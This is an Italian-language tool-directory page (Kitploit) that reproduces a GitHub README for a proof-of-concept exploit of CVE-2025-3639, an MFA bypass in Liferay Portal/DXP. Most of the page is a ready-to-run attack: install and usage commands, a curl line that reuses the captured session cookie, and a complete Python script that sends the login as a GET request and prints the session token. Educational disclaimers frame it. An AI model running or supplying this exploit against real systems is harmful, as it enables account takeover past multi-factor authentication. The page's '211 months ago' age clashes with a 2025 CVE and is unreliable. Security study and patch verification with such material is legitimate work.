Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-3639 — vulnerabilità di bypass del login in Liferay Portal (versioni 7.3.0–7.4.3.132) e Liferay DXP (varie versioni dalla 2024.Q1 alla 2025.Q1.6) | Kitploit
Strumenti/GitHubGitHub/6lj/cve-2025-3639
Autenticazione e AutorizzazioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHub6lj/cve-2025-3639

CVE-2025-3639

vulnerabilità di bypass del login in Liferay Portal (versioni 7.3.0–7.4.3.132) e Liferay DXP (varie versioni dalla 2024.Q1 alla 2025.Q1.6)

Vedi Repository
211 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-3639 PoC - Bypass di Login Liferay Portal/DXP

Questo repository contiene un Proof of Concept (PoC) per CVE-2025-3639, una vulnerabilità di bypass del login in Liferay Portal (versioni 7.3.0–7.4.3.132) e Liferay DXP (varie versioni da 2024.Q1 a 2025.Q1.6). Il PoC dimostra come un utente non autenticato con credenziali valide possa aggirare l'autenticazione multi-fattore (MFA) modificando una richiesta POST in GET, ottenendo potenzialmente accesso non autorizzato agli account utente.

Avvertenza: Questo PoC è solo a scopo educativo. Testare o sfruttare questa vulnerabilità senza autorizzazione è illegale e non etico. Utilizzalo solo con esplicita autorizzazione scritta del proprietario del sistema.

Requisiti

  • Ambiente: Linux (es. Kali Linux, Ubuntu o un ambiente virtualizzato).
  • Dipendenze:
    root@kitploit:~
    sudo apt-get update
    sudo apt-get install python3 python3-requests
    pip3 install requests
    
  • Rete: Accesso a un'istanza target di Liferay Portal/DXP (deve essere in un ambiente di test con autorizzazione esplicita).
  • Credenziali: Credenziali utente valide per l'istanza Liferay target.

Installazione

  1. Clona il repository:

    root@kitploit:~
    git clone https://github.com/6lj/CVE-2025-3639.git
    cd CVE-2025-3639
    
  2. Assicurati che Python 3 e la libreria requests siano installati:

    root@kitploit:~
    pip3 install requests
    

Cosa Fa

  • Il PoC sfrutta CVE-2025-3639 modificando una richiesta di login POST in GET, aggirando i controlli MFA.
  • Invia una richiesta HTTP GET personalizzata con credenziali valide per autenticarsi senza completare il processo MFA.
  • Lo script è progettato per dimostrare la vulnerabilità in un ambiente controllato e autorizzato.

Utilizzo

Esegui lo script PoC con gli argomenti appropriati (sostituisci <target_url>, <username> e <password> con l'URL dell'istanza Liferay target e credenziali valide).

poc.py

root@kitploit:~
python3 poc.py --target <target_url> --username <username> --password <password>
  • Parametri:
    • --target: L'URL dell'istanza Liferay Portal/DXP (es. http://example.com).
    • --username: Nome utente valido per l'istanza target.
    • --password: Password valida per l'utente.

Esempio

root@kitploit:~
python3 poc.py --target http://192.168.1.100 --username [email protected] --password Test123!

Verifica dei Risultati

  • Successo: Se l'exploit funziona, lo script restituirà un token di sessione valido o un messaggio di successo che indica l'accesso all'account utente senza MFA.

    root@kitploit:~
    curl -b "COOKIE=<session_token>" http://<target_url>/api/jsonws/user/get-current-user
    
    • Output previsto: Dettagli dell'utente che confermano l'autenticazione riuscita.
  • Fallimento: Se il server restituisce un errore (es. 401 Unauthorized o 403 Forbidden), l'istanza potrebbe non essere vulnerabile o MFA non è abilitato.

  • Monitoraggio del Traffico: Usa uno strumento come Wireshark per ispezionare il traffico HTTP:

    root@kitploit:~
    sudo wireshark -f "tcp port 80 or tcp port 443"
    

Script PoC

Di seguito il codice d'esempio per poc.py:

root@kitploit:~
import requests
import argparse

def exploit(target, username, password):
    print(f"[*] Attempting CVE-2025-3639 exploit on {target}")
    login_url = f"{target}/c/portal/login"

    params = {
        "p_auth": "",
        "login": username,
        "password": password
    }
    
    try:
        response = requests.get(login_url, params=params, allow_redirects=True)
        if response.status_code == 200 and "JSESSIONID" in response.cookies:
            print(f"[+] Success! Session token: {response.cookies['JSESSIONID']}")
            return True
        else:
            print(f"[-] Failed: {response.status_code} - {response.text}")
            return False
    except Exception as e:
        print(f"[-] Error: {str(e)}")
        return False

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="CVE-2025-3639 PoC for Liferay Portal/DXP")
    parser.add_argument("--target", required=True, help="Target Liferay URL (e.g., http://example.com)")
    parser.add_argument("--username", required=True, help="Valid username")
    parser.add_argument("--password", required=True, help="Valid password")
    args = parser.parse_args()
    
    exploit(args.target, args.username, args.password)

Note Importanti

  • Questo PoC richiede credenziali valide, poiché la vulnerabilità consente di aggirare l'MFA ma non di indovinare le credenziali.
  • Testalo solo in un ambiente controllato con esplicita autorizzazione del proprietario del sistema.
  • La vulnerabilità è stata corretta nelle versioni più recenti di Liferay Portal/DXP. Aggiorna all'ultima versione per mitigare questo problema.
  • Liferay Security Advisory
  • NVD CVE-2025-3639
  • GitHub Repository

Dichiarazione di non responsabilità

Questo progetto è solo a scopo educativo. L'autore non è responsabile per qualsiasi uso non autorizzato o illegale di questo PoC. Ottieni sempre esplicita autorizzazione dal proprietario del sistema prima di testare.

Scarica lo strumento